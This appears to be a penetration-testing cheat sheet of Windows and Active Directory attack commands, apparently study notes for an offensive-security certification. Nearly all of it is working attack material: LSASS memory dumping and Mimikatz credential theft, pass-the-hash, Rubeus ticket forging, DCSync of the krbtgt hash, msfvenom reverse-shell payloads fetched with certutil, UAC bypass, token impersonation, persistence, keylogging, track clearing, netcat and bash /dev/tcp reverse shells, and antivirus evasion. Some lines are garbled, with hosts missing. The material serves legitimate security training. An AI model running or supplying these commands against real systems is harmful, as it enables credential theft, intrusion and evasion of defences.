rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <lsass PID> C:\Users\Public\lsass.dmp full
```bash # Kiwi - Meterpreter load kiwi creds_all lsa_dump_sam lsa_dump_secrets # Mimikatz - Meterpreter cd C:\\ mkdir Temp cd Temp upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe shell mimikatz.exe privilege::debug lsadump::sam lsadump::secrets sekurlsa::logonPasswords ``` ### **Lateral Movement** **Pass-The-Hash (PTH)** ```powershell # PASS THE HASH - PSExec hashdump exit search psexec use exploit/windows/smb/psexec set payload windows/x64/meterpreter/reverse_tcp set SMBUser Administrator set SMBPass ``` #### OverPass-The-Hash (Pass-the-Key) 
#Invoke-Mimikatz
#To perform OPTH with AES256 encryption
Invoke-Mimikatz -Command "sekurlsa::pth /user:Administrator /domain:us.techcorp.local /aes256:<aes256key> /run:powershell.exe"

#SafetyKatz
SafetyKatz.exe "sekurlsa::pth /user:administrator /domain:us.techcorp.local /aes256:<aes256keys> /run:cmd.exe"

#Rubeus
#For OPTH using NTLM hashes (doesn’t require elevation)
Rubeus.exe asktgt /user:administrator /rc4:<ntlmhash> /ptt

#For OPTH with AES256 encryption (requires elevation):
Rubeus.exe asktgt /user:administrator /aes256:<aes256keys> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
#### DCSync Attack (Extracting Credentials from the Domain Controller) 
#Extracting the krbtgt Hash
#To obtain the krbtgt hash using DCSync (requires Domain Admin privileges):
Invoke-Mimikatz -Command "lsadump::dcsync /user:us\krbtgt"

#SafetyKatz
SafetyKatz.exe "lsadump::dcsync /user:us\krbtgt"
#By default, Domain Admin privileges are required to execute this attack.
#### **Start Session** ```powershell ##PSSession #Creates a new session New-PSSession #Interacts with a remote session Enter-PSSession ##Invoke-Command #Run a command remotely Invoke-Command -Scriptblock {Get-Process} -ComputerName (Get-Content ) #Execute a script from a file: Invoke-Command -FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content ) #Run a locally defined function on remote machines: Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content ) Pass arguments to a remote function (only positional arguments allowed): Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content ) -ArgumentList Maintain a stateful session: $Sess = New-PSSession -ComputerName Server1 Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process} Invoke-Command -Session $Sess -ScriptBlock {$Proc.Name} ``` ## **Windows Privilege Escalation** ```powershell # PrivescCHECK - PowerShell script powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_%COMPUTERNAME% -Format TXT,CSV,HTML,XML" ## Basic mode powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck" ## Extended Mode + Export Txt Report powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_%COMPUTERNAME%" ``` ### **Kernel** ```bash # WIN KERNEL msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o payload.exe python3 -m http.server # Download payload.exe on target ``` ```bash ## Windows-Exploit-Suggester Install mkdir Windows-Exploit-Suggester cd Windows-Exploit-Suggester wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/f34dcc186697ac58c54ebe1d32c7695e040d0ecb/windows-exploit-suggester.py # ^^ This is a python3 version of the script cd Windows-Exploit-Suggester python ./windows-exploit-suggester.py --update pip install xlrd --upgrade ./windows-exploit-suggester.py --database YYYY-MM-DD-mssb.xlsx --systeminfo win7sp1-systeminfo.txt ./windows-exploit-suggester.py --database YYYY-MM-DD-mssb.xlsx --systeminfo win2008r2-systeminfo.txt ``` ```bash ## METASPLOIT ## Global set setg RHOSTS setg RHOST use exploit/multi/handler options set payload windows/x64/meterpreter/reverse_tcp set LHOST set LPORT use post/multi/recon/local_exploit_suggester set SESSION ## MsfConsole Meterpreter Privesc getprivs getsystem # Exploitable vulnerabilities modules exploit/windows/local/bypassuac_dotnet_profiler exploit/windows/local/bypassuac_eventvwr exploit/windows/local/bypassuac_sdclt exploit/windows/local/cve_2019_1458_wizardopium exploit/windows/local/cve_2020_1054_drawiconex_lpe exploit/windows/local/ms10_092_schelevator exploit/windows/local/ms14_058_track_popup_menu exploit/windows/local/ms15_051_client_copy_image exploit/windows/local/ms16_014_wmi_recv_notif ``` ### **UAC** ```bash # UAC - UACME msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe > backdoor.exe ## METASPLOIT - Listening setg RHOSTS setg RHOST use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST set LPORT ## Meterpreter (Unprivileged session) cd C:\\ mkdir Temp cd Temp upload /root/backdoor.exe upload /root/Desktop/tools/UACME/Akagi64.exe shell Akagi64.exe 23 C:\Temp\backdoor.exe akagi32.exe [Key] [Param] akagi64.exe [Key] [Param] ## Elevated Meterpreter Received on the listening session ps -S lsass.exe migrate hashdump ``` ### **Access Token** ```bash # ACCESS TOKEN IMPERSONATION ## METASPLOIT - Meterpreter (Unprivileged session) pgrep explorer migrate getuid getprivs load incognito list_tokens -u impersonate_token "ATTACKDEFENSE\Administrator" getuid getprivs # Access Denied pgrep explorer migrate getprivs list_tokens -u impersonate_token "NT AUTHORITY\SYSTEM" ``` ### **Windows Credential Dumping** ```bash # Exploitation msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=1234 -f exe > payload.exe python -m SimpleHTTPServer 80 ## METASPLOIT setg RHOSTS setg RHOST use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST set LPORT run ## On target system certutil -urlcache -f http:///payload.exe payload.exe # Run payload.exe # METASPLOIT - Meterpreter sysinfo getuid pgrep lsass migrate getprivs # Creds dumping - Meterpreter load kiwi creds_all lsa_dump_sam lsa_dump_secrets # MIMIKATZ cd C:\\ mkdir Temp cd Temp upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe shell mimikatz.exe privilege::debug lsadump::sam lsadump::secrets sekurlsa::logonPasswords # PASS THE HASH ## sekurlsa::logonPasswords background search psexec use exploit/windows/smb/psexec set LPORT set SMBUser Administrator set SMBPass exploit ``` ``` crackmapexec smb -u Administrator -H "" -x "whoami" ``` ### **Token Impersonation** ```bash # Privilege Escalation - Meterpreter getuid getprivs hashdump load incognito list_tokens -u impersonate_token "ATTACKDEFENSE\Administrator" getuid ps migrate hashdump ``` #### Relaying ```powershell ##PowerShell #Get services with unquoted paths and a space in their name Get-WmiObject -Class win32_service | select pathname #Check permissions info regarding a service sc.exe sdshow ##PowerUp #Run all PrivEsc checks Invoke-AllChecks ##PrivEsc #Run all PrivEsc checks Invoke-PrivEscCheck ##WinPeas #Run all PrivEsc checks winPEASx64.exe ``` ### Unquoted Service Path 
##PowerUp
#List path for windows services:
Get-WmiObject -Class win32_service | select pathname
#Get services with unquoted paths and a space in their name:
Get-ServiceUnquoted -Verbose
#Get services where the current user can write to its binary path and change arguments to the binary:
Get-ModifiableServiceFile -Verbose
#Get the services whose configuration current user can be modified:
Get-ModifiableServiceFile -Verbose
#### [**Feature Abuse**](https://dev-angelist.gitbook.io/crtp-notes/readme/network-security-3/network-security/2.1) #### [GPO Abuse](https://dev-angelist.gitbook.io/crtp-notes/readme/network-security-3/network-security/5.1.3-gpo-abuse) ## **Persistence** ```bash # Administrative Privileges required! # RDP - Meterpreter background use exploit/windows/local/persistence_service #or search platform:windows persistence set payload windows/meterpreter/reverse_tcp set SESSION 1 # Regain access use multi/handler set payload windows/meterpreter/reverse_tcp set LHOST set LPORT # Enabling RDP use post/windows/manage/enable_rdp sessions set SESSION 1 # Meterpreter - Enable RDP run getgui -e -u -p ``` ```bash # KEYLOGGING - Meterpreter keyscan_start keyscan_dump keyscan_stop ``` **Clearing tracks** ```bash # Meterpreter clearenv ``` ## **Shells** ```bash # NETCAT - Install sudo apt update && sudo apt install -y netcat # or upload the nc.exe on the target machine nc nc -nv nc -nvu ## NC Listener nc -nvlp nc -nvlup ## Transfer files # Target machine nc.exe -nvlp > test.txt # Attacker machine echo "Hello target" > test.txt nc -nv < test.txt ``` ```bash # BIND SHELL ## Target Win machine - Bind shell listener with executable cmd.exe nc.exe -nvlp -e cmd.exe ## Attacker Linux machine nc -nv ## Target Linux machine - Bind shell listener with /bin/bash nc -nvlp -c /bin/bash ## Attacker Win machine nc.exe -nv ``` ```bash # REVERSE SHELL ## Attacker Linux machine nc -nvlp ## Target Win machine nc.exe -nv -e cmd.exe ## Attacker Linux machine nc -nvlp ## Target Linux machine nc -nv -e /bin/bash ``` ```bash # Spawn shells python -c 'import pty; pty.spawn("/bin/sh")' import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash") echo os.system('/bin/bash') /bin/sh -i bash -i >& /dev/tcp//4444 0>&1 & /dev/tcp//4444 0>&1'"); ?> /usr/bin/script -qc /bin/bash /dev/null perl -e 'exec "/bin/sh";' perl: exec "/bin/sh"; ruby: exec "/bin/sh" lua: os.execute('/bin/sh') IRB: exec "/bin/sh" vi: :!bash vi: :set shell=/bin/bash:shell nmap: !sh ``` ## **Obfuscation** ```bash # SHELLTER - Install sudo apt update && sudo apt install -y shellter sudo dpkg --add-architecture i386 && sudo apt update && sudo apt -y install wine32 rm -r ~/.wine cd /usr/share/windows-resources/shellter sudo shellter mkdir AVBypass cd AVBypass cp /usr/share/windows-binaries/vncviewer.exe . # Proceed in Sellter window ``` ```bash # INVOKE-OBFUSCATION PowerShell script - Install cd /opt sudo git clone https://github.com/danielbohannon/Invoke-Obfuscation.git sudo apt update && sudo apt install -y powershell pwsh cd /opt/Invoke-Obfuscation/ Import-Module ./Invoke-Obfuscation.psd1 cd .. Invoke-Obfuscation ``` ## **Transferring Files** ```bash # PYTHON WEB SERVER python -V python3 -V py -v # on Windows # Python 2.7 python -m SimpleHTTPServer # Python 3.7 python3 -m http.server # On Windows, try python -m http.server py -3 -m http.server ``` ## **Shells** ```bash cat /etc/shells # /etc/shells: valid login shells /bin/sh /bin/dash /bin/bash /bin/rbash /bin/bash -i /bin/sh -i ``` ### **TTY Shells** ```bash # BASH /bin/bash -i /bin/sh -i SHELL=/bin/bash script -q /dev/null # Setup environment variables export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin export TERM=xterm export SHELL=/bin/bash ``` ```bash # PYTHON python --version python -c 'import pty; pty.spawn("/bin/bash")' ## Fully Interactive TTY # Background (CTRL+Z) the current remote shell stty raw -echo && fg # Reinitialize the terminal with reset reset ``` ```bash # FULL TTY PYTHON3 SHELL python3 -c 'import pty; pty.spawn("/bin/bash")' # Background CTRL+Z stty raw -echo && fg # ENTER export SHELL=/bin/bash export TERM=screen stty rows 36 columns 157 # stty -a to get the rows & columns of the attacker terminal reset ``` ```bash # PERL perl -h perl -e 'exec "/bin/bash";' ``` ## **Dumping & Cracking** ```bash hashdump #using Metasploit # JohnTheRipper john --list=formats | grep NT john --format=NT hashes.txt gzip -d /usr/share/wordlists/rockyou.txt.gz john --wordlist=/usr/share/wordlists/rockyou.txt # To crack the password from your previous output (hashdump,shadow file ) john --format=NT win_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt john -wordlist /usr/share/wordlists/rockyou.txt crack.hash john -wordlist /usr/share/wordlists/rockyou.txt -users users.txt test.hash #this is another way to crack passwords (that requires shadow file with passwd file) unshadow passwd shadow > unshadowed.txt john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt hashcat -a 3 -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt hashcat -a 3 -m 1000 --show hashes.txt /usr/share/wordlists/rockyou.txt hashcat -m 1000 -a 0 -o found.txt --remove crack.hash rockyou-10.txt ``` ## **Tools Installation** ```bash # Gobuster - Install sudo apt update && sudo apt install -y gobuster # Dirbuster - Install sudo apt update && sudo apt install -y dirb # Nikto - Install sudo apt update && sudo apt install -y nikto # BurpSuite - Install sudo apt update && sudo apt install -y burpsuite # SQLMap - Install sudo apt update && sudo apt install -y sqlmap # XSSer - Install sudo apt update && sudo apt install -y xsser # WPScan - Install sudo apt update && sudo apt install -y wpscan # Hydra - Install sudo apt update && sudo apt install -y hydra ```